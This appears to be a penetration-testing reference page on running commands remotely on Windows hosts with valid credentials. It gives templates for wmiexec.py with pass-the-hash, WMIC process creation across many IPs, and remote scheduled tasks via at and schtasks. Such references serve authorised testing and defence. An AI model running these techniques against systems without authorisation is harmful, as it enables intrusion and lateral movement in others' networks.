Authenticated RCE

Remote code execution on Windows target using legitimate credentials:


The content below should be moved to their dedicated section:

Automated Tools

wmiexec.py

Executes a command or a semi-interactive shell using Windows Management Instrumentation (WMI).

wmiexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]

Tip

Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique.

Manual Process

WMIC
wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command]

If you leave off the /user and /password, it will pass through the existing user’s credentials (see SMB Sessions).

Tip

Replace [targetIP] by @[filename] to run [command] on every IP listed in the file.

schtasks and at

This process creates a service on the remote target in the very near future that executes a command.

1. Establish an SMB session:

net use \\[targetIP] /u:[admin_user]

2. Verify that the Schedule service is running and start it if not:

sc \\[targetIP] query schedule
sc \\[targetIP] start schedule

3. Check the current local time on the target machine:

net time \\[targetIP]

4. Schedule the job:

at \\[targetIP] [HH:MM] [A|P] [command]
schtasks /create /tn [taskname] /s [targetIP] /u [user] /p [password] /sc [frequency] /st [HH:MM:SS] /sd [startdate] /tr [command]

5. Verify the job status:

at \\[targetIP]
schtasks /query /s [targetIP]